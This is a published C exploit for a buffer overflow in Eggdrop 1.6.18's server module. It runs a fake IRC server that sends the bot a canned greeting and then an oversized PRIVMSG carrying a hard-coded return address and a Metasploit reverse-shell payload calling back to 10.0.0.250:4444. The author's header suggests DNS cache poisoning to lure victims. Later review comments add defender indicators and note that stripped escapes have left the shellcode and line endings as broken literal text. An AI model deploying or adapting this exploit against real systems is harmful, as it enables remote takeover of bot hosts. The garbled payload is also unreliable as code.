
# Title : Eggdrop Server Module Message Handling Remote BoF Exploit
# Published : 2007-10-10
# Author : bangus/magnum


/* 
  Eggdrop Server Module Message Handling Remote Buffer Overflow Vulnerability
  http://www.securityfocus.com/bid/24070
  discovered by Bow Sineath
  tested on eggdrop 1.6.18 / linux 2.4

  -exploit is a fake ircd

  replace shellcode.. strip 0x00,0x0a and a few more probably.
  remember to add n at end of shellcode.
  poison some dns cache or .jump
  play.

  -bangus/magnum
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>
#include <arpa/inet.h>

#define LISTENPORT 6667      /* TCP port the fake ircd listens on (the usual IRC port; the greeting below also names 6667) */
#define BACKLOG 3            /* listen(2) backlog */
#define RETADDR 0xbffff7b9   /* fixed value copied into the crafted line at offset 365 (see main); a single hard-coded stack
                              * address like this is exactly what ASLR / stack protection on the bot host defeats */


/*
 * linux/x86/shell_reverse_tcp - 99 bytes
 * http://www.metasploit.com
 * Encoder: x86/shikata_ga_nai
 * LPORT=4444, LHOST=10.0.0.250
 */

unsigned char shellcode[] =
	/* Payload appended to the crafted line (main copies it at offset 393, including the NUL).
	 * NOTE(review): in this copy of the listing the backslash escapes have been stripped by
	 * extraction -- each "xNN" is literal ASCII text, not a byte value -- so the array as
	 * written is plain text and not the 99-byte encoded payload the header describes.
	 * From a monitoring point of view, the header's reverse-connect LHOST:LPORT is the
	 * outbound indicator a compromised bot host would show. */
	"xbfx1ax2fxf0x55xdbxc9xd9x74x24xf4x5bx31xc9xb1"
	"x13x31x7bx12x83xebxfcx03x61x21x12xa0xa4xe6x81"
	"x08x95x72x24xe5x7fxdbxa1x18xb2x5bx22x83xfcx63"
	"x88xb4xb5xe2xebxeex1fx7dx06x11x9fx87x70x79x8e"
	"x2bx3ex1fxe3x5ax21x6fx65x0dxf3xc3xe0x4cxb0x2e"
	"x72xdcx5fx9ex5dx92xf7x88x8ex36x61x27x59x55x23"
	"xe4xd0x7bx74x01x2fxfbx75x16"
	"n";           /* literal 'n' here: the intended line-ending escape was lost the same way */

char *req=
/* Canned IRC server greeting (NOTICE AUTH lines, numerics 001-005, 251-266, MOTD, a MODE
 * line) replayed verbatim to every client so the connection looks like a real hybrid-7
 * ircd before the crafted line is sent. It hard-codes the nick "tata": main never reads
 * the client's own NICK/USER registration, which is one tell of a fake server.
 * NOTE(review): the trailing "n" on every line is a stripped "\n" escape in this copy;
 * as written the whole greeting is a single line with no CRLF terminators. */
":hybrid7.debian.local NOTICE AUTH :*** Looking up your hostname...n"
":hybrid7.debian.local NOTICE AUTH :*** Checking Identn"
":hybrid7.debian.local NOTICE AUTH :*** No Ident responsen"
":hybrid7.debian.local NOTICE AUTH :*** Your forward and reverse DNS do not match, ignoring hostname.n"
":hybrid7.debian.local 001 tata :Welcome to the debian Internet Relay Chat Network tatan"
":hybrid7.debian.local 002 tata :Your host is hybrid7.debian.local[127.0.0.1/6667], running version hybrid-7.2.2.dfsg.1-debian-3n"
":hybrid7.debian.local 003 tata :This server was created Dec  6 2006 at 19:21:25n"
":hybrid7.debian.local 004 tata hybrid7.debian.local hybrid-7.2.2.dfsg.1-debian-3 DGabcdfgiklnorsuwxyz biklmnopstveIh bkloveIhn"
":hybrid7.debian.local 005 tata CALLERID CASEMAPPING=rfc1459 DEAF=D KICKLEN=160 MODES=4 NICKLEN=15 PREFIX=(ohv)@%+ STATUSMSG=@%+ TOPICLEN=350 NETWORK=debian MAXLIST=beI:25 MAXTARGETS=4 CHANTYPES=#& :are supported by this servern"
":hybrid7.debian.local 005 tata CHANLIMIT=#&:15 CHANNELLEN=50 EXCEPTS=e INVEX=I CHANMODES=eIb,k,l,imnpst AWAYLEN=160 KNOCK ELIST=CMNTU SAFELIST :are supported by this servern"
":hybrid7.debian.local 251 tata :There are 0 users and 3 invisible on 1 serversn"
":hybrid7.debian.local 254 tata 1 :channels formedn"
":hybrid7.debian.local 255 tata :I have 3 clients and 0 serversn"
":hybrid7.debian.local 265 tata :Current local users: 3  Max: 3n"
":hybrid7.debian.local 266 tata :Current global users: 3  Max: 3n"
":hybrid7.debian.local 250 tata :Highest connection count: 3 (3 clients) (10 connections received)n"
":hybrid7.debian.local 375 tata :- hybrid7.debian.local Message of the Day - n"
":hybrid7.debian.local 376 tata :End of /MOTD command.n"
":tata!ab@i.love.debian.org MODE tata :+in";

/*
 * Fake IRC server. Binds LISTENPORT on all interfaces and, for each accepted
 * client, sends the canned greeting (req), then one crafted line built in
 * data[] (0x41 padding, ':' at 0, retaddr at 365, the PRIVMSG text at 369,
 * shellcode at 393), sleeps, and closes. It never reads from the client.
 *
 * Defender notes: on the wire this is a registration burst followed by a
 * single oversized (393 + sizeof(shellcode) byte) PRIVMSG line from a
 * "server" that never consumed the bot's NICK/USER. Mitigation is an eggdrop
 * build fixed for BID 24070 (header) plus stack protection/ASLR on the bot
 * host, which the fixed RETADDR does not survive.
 *
 * Returns -1 on socket/bind/listen/accept failure; the accept loop has no
 * exit, so the trailing close(s) and return 0 are unreachable.
 */
int main() {

	int s,conn;
	struct sockaddr_in addr, cli_addr;
	int size = sizeof(struct sockaddr_in);   /* NOTE(review): accept() expects socklen_t *, not int * */
	unsigned long retaddr=RETADDR;
	char data[393+sizeof(shellcode)];        /* crafted line; sizeof(shellcode) includes its NUL */

	if ((s = socket(AF_INET, SOCK_STREAM,0)) == -1) {
    		perror("socket");
    		return(-1);
	}

	memset((char *) &addr, 0, sizeof(struct sockaddr_in));

	addr.sin_family = AF_INET;
	addr.sin_port = htons(LISTENPORT);
	addr.sin_addr.s_addr = htonl(INADDR_ANY);   /* listens on every interface */

	if (bind(s,(struct sockaddr *)&addr, size) == -1) {
    		perror("bind");
		return(-1);
	}
	
	if (listen(s,BACKLOG) == -1) {
    		perror("listen");
		return(-1);
	}

	/* Serves clients one at a time, forever; there is no way out of this loop. */
	while(1) {

		conn = accept(s, (struct sockaddr *)&cli_addr, &size);
		if (conn == -1) {
			perror("accept");
			return (-1);		
		}

		/* NOTE: the "n" in the printf strings below is a stripped "\n" escape in this copy. */
		printf("connection from %s.n", inet_ntoa(cli_addr.sin_addr));

		sleep(1);

		printf("sending greeting.n");
		send(conn,req,strlen(req),0);   /* return value (error / short send) is not checked */

		sleep(1);

		/* Build the crafted line: fill with 0x41, ':' at offset 0, retaddr at 365,
		 * 24 bytes of PRIVMSG text (no terminator) at 369, shellcode at 393.
		 * NOTE(review): the copy length is sizeof(long), which is 4 on the 32-bit
		 * target the header names but 8 on LP64 builds. */
	        memset(data, 0x41, sizeof(data));
	        memcpy(data,":",1); 
	        memcpy(data+365, &retaddr, sizeof(long));
	        memcpy(data+369," PRIVMSG Lamestb0t :test",24);
		memcpy(data+393,shellcode,sizeof(shellcode));

		printf("sending %d bytes of data.n",sizeof(data));   /* NOTE(review): %d with a size_t argument; %zu is the matching specifier */
		send(conn,data, sizeof(data), 0);                     /* return value not checked */
	
		sleep(10);

		printf("closing connection.n");
		close(conn);

	}

	/* Unreachable: the loop above never terminates. */
	close(s);

	return 0;
}
